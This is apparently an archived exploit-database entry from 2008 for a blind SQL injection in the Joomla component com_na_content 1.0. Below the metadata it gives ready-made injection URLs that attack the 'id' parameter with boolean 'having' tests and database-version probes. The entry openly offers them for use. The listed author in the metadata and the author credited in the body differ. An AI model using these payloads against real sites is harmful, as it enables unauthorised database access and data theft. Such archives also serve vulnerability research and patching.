[] NeoSense

Joomla! Component com_na_content 1.0 - Blind SQL Injection

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2008-12-28 
date_updated: 2008-12-29 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

Author: xoron

Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
            /index.php?option=com_na_content&task=view&id=1 having 1=1
or

            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5

!! You can use this for inj.
!! Thans for Ozan!

# milw0rm.com [2008-12-29]